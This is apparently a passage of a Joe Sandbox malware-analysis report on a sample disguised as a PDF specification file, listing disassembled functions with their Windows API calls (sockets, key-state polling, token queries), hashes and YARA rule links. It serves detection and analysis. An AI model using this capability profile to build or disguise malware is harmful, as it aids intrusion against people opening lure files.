                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                      • String ID:
                                      • API String ID: 3740051246-0
                                      • Opcode ID: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                      • Instruction ID: b0e0f0f7dcad104d4d5454cdaea41ceadf1b9212221ace56f960d3099a047853
                                      • Opcode Fuzzy Hash: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                      • Instruction Fuzzy Hash: D7515A71218204AFD706EF68C881E6BB7F9FF89304F00892DF5959B2A1DB70E904CB52
                                      Function 00384AC2 Relevance: 7.6, APIs: 5, Instructions: 136windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384B5B
                                      • IsMenu.USER32(00000000), ref: 00384B7B
                                      • CreatePopupMenu.USER32 ref: 00384BAF
                                      • GetMenuItemCount.USER32(000000FF), ref: 00384C0D
                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00384C3E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID:
                                      • API String ID: 93392585-0
                                      • Opcode ID: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                      • Instruction ID: fc8dcc296d8b24523bd26809fefed24bfd2d5203950ba912473613217874c611
                                      • Opcode Fuzzy Hash: c5c2dcb13908b27cea7b78ea3d567ed2c4a7e61d0f973c19c63e1271b25b95d8
                                      • Instruction Fuzzy Hash: A651027060130AEFCF23EF68C888BADBBF8BF44318F1541A9E4559B691E3709944CB51
                                      Function 00398DE2 Relevance: 7.6, APIs: 5, Instructions: 136networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,003DDC00), ref: 00398E7C
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398E89
                                      • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00398EAD
                                      • #16.WSOCK32(?,?,00000000,00000000), ref: 00398EC5
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398F6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$select
                                      • String ID:
                                      • API String ID: 1043644060-0
                                      • Opcode ID: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                      • Instruction ID: 9b774e04f543fa7f34be57d597d1dc2afb4b56d2a935dc5d6ad3fee427b65690
                                      • Opcode Fuzzy Hash: b9ad38ce6867a4facfc06f6677e9cd1ce48a4d95d59a7fd46d673a1be565beaa
                                      • Instruction Fuzzy Hash: A8419271900204AFCB16EF64DD95EAEB7BDEF49314F104669F5169B291DF70AE00CB60
                                      Function 003ACCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                      • Instruction ID: 8667ddfcc76a13f8664d9d1b5e5ba3a372d86b3d1ffa9780c13873cf39f4bd3c
                                      • Opcode Fuzzy Hash: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                      • Instruction Fuzzy Hash: EE41B439910104AFC716DF68CC44FA9BB68EB0A310F161275F959A72E1C730AD51DB90
                                      Function 00391206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003912B4
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003912DD
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0039131C
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00391341
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00391349
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String
                                      • String ID:
                                      • API String ID: 2832842796-0
                                      • Opcode ID: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                      • Instruction ID: d5ea258f9cd589abc01ca6d052c3891d8c0e9c3e1c81aa1a8d8d023f00418aa1
                                      • Opcode Fuzzy Hash: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                      • Instruction Fuzzy Hash: 4241FA39600105DFCF02EF64C981AAEBBF5EF09714B1484A9E94AAF362CB31ED01DB51
                                      Function 0035B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(000000FF), ref: 0035B64F
                                      • ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                      • GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                      • GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                      • Instruction ID: 23f2c4054c1bf5edf5604d4a5fc14dbe380e34a5ade12694d2d6999916f53a56
                                      • Opcode Fuzzy Hash: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                      • Instruction Fuzzy Hash: E2413E35608119FBDF1A9F64C844EE9FBB4FB05325F204319F869962A0DB30A994DF91
                                      Function 0037B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 0037B369
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 0037B413
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0037B41B
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 0037B429
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0037B431
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                      • Instruction ID: 2c0f25f64db6ec05fbe9d5f808d4f7959c85d2938e0f64cde47fdc1633a08e30
                                      • Opcode Fuzzy Hash: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                      • Instruction Fuzzy Hash: 5B31C07190021DEFEF15CF68D94DB9EBBB9EB04319F118229F825EA1D1C3B49954CB90
                                      Function 00398B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00398BD3
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00398BE2
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00398BFE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLastconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 3701255441-0
                                      • Opcode ID: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                      • Instruction ID: d882687a6ccdb8923175375094e4b7deb3cbbddc1f5c6a30b2e9df70553c03ce
                                      • Opcode Fuzzy Hash: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                      • Instruction Fuzzy Hash: 292190312002149FDB12AF68CC85F7EB7ADAF89750F044559F956EB3A2CB74AD018B61
                                      Function 00398420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindow.USER32(00000000), ref: 00398441
                                      • GetForegroundWindow.USER32 ref: 00398458
                                      • GetDC.USER32(00000000), ref: 00398494
                                      • GetPixel.GDI32(00000000,?,00000003), ref: 003984A0
                                      • ReleaseDC.USER32(00000000,00000003), ref: 003984DB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ForegroundPixelRelease
                                      • String ID:
                                      • API String ID: 4156661090-0
                                      • Opcode ID: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                      • Instruction ID: b17d293d7134817d9f60dc38255fcf90223a7502d9af8af94940b1c2f6ee49dd
                                      • Opcode Fuzzy Hash: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                      • Instruction Fuzzy Hash: D0216275A00204AFDB01EFA5D845A5EBBE9EF49301F048879F85ADB251DB70BD00CB50
                                      Function 0035AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                      • SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                      • BeginPath.GDI32(?), ref: 0035B009
                                      • SelectObject.GDI32(?,00000000), ref: 0035B033
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                      • Instruction ID: 3935a9393c8e6e01e470ea94aaa9ab50ed3a84c1f585f88ac9f35cc35d2d9038
                                      • Opcode Fuzzy Hash: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                      • Instruction Fuzzy Hash: A52160B0800205AFDB129F59ED84F9E7BA8B710356F18472AF825A61F0C3715849DB55
                                      Function 0037ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                      • GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                      • GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                      • HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                      • Instruction ID: 52c33abca12398fb53ac6cfdb98265a328a187101b003ef60ae5d757ff74544a
                                      • Opcode Fuzzy Hash: c3c36cac4f3f82dfff899befacf59add2e243ce35c40d141ec2648b7aea02ae0
                                      • Instruction Fuzzy Hash: F60181B0200205BFDB224FA5DC48D6B7BACEF89355B114439F409C3250D671DC51CB61
                                      Function 00387A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387A74
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A82
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00387A8A
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00387A94
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                      • Instruction ID: 5613e833f16b4338959938498a5b60236c1ee5491a71cf8ce3992b85e9689b97
                                      • Opcode Fuzzy Hash: f3a3229c5b4e67861c75147ea5f9101db7073a65ddefe592a5d9df06791fe682
                                      • Instruction Fuzzy Hash: 23012931C04619EBCF06AFE4DC88AEDBB7DFB08711F150495E502F2250DB34E65487A1
                                      Function 00379ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CLSIDFromProgID.OLE32 ref: 00379ADC
                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00379AF7
                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00379B05
                                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00379B15
                                      • CLSIDFromString.OLE32(?,?), ref: 00379B21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                      • Instruction ID: d634e4c02750dffa52a9a86994efe2f74cf290f0661a5e38fbe6eb9cd1876852
                                      • Opcode Fuzzy Hash: 3b6f7e2978cd5de57ad632d13caed294bf7e4de224f5cb8ab3e5737906c3d0cd
                                      • Instruction Fuzzy Hash: 32018F76600204BFDB224F64EC44F9ABBEDEB44351F148039F90AE6210D775ED009BA0
                                      Function 0037AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0037AA79
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0037AA83
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0037AA92
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0037AA99
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0037AAAF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                      • Instruction ID: 91657624a1d20a31aa9356a43290fa10c027621c8da6bcfea3027a3411b88132
                                      • Opcode Fuzzy Hash: 6d348caa78b534ec444c49f188941b31b61633cae840ddaaa6147bf77dcbc96a
                                      • Instruction Fuzzy Hash: 28F0C2312003146FEB221FA4EC88E6B3BACFF89754F004029F905C7190DB64AC02CF61
                                      Function 0037AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0037AADA
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAE4
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAF3
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AAFA
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037AB10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 32c5fce5e0838bfb4952da16771c91b9b0cea00e314d9ae04cfc9f2d452ed483
                                      • Instruction ID: 587ebedc3deeb186a9cf057577990a426df113b7d85bf608e9bc90951bc8a616
                                      • Opcode Fuzzy Hash: 32c5fce5e0838bfb4952da16771c91b9b0cea00e314d9ae04cfc9f2d452ed483
                                      • Instruction Fuzzy Hash: 02F062752012186FEB220FA5EC88E6B3B6DFF85754F014039F946C7190CB65AC02DB61
                                      Function 0037EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0037EC94
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 0037ECAB
                                      • MessageBeep.USER32(00000000), ref: 0037ECC3
                                      • KillTimer.USER32(?,0000040A), ref: 0037ECDF
                                      • EndDialog.USER32(?,00000001), ref: 0037ECF9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
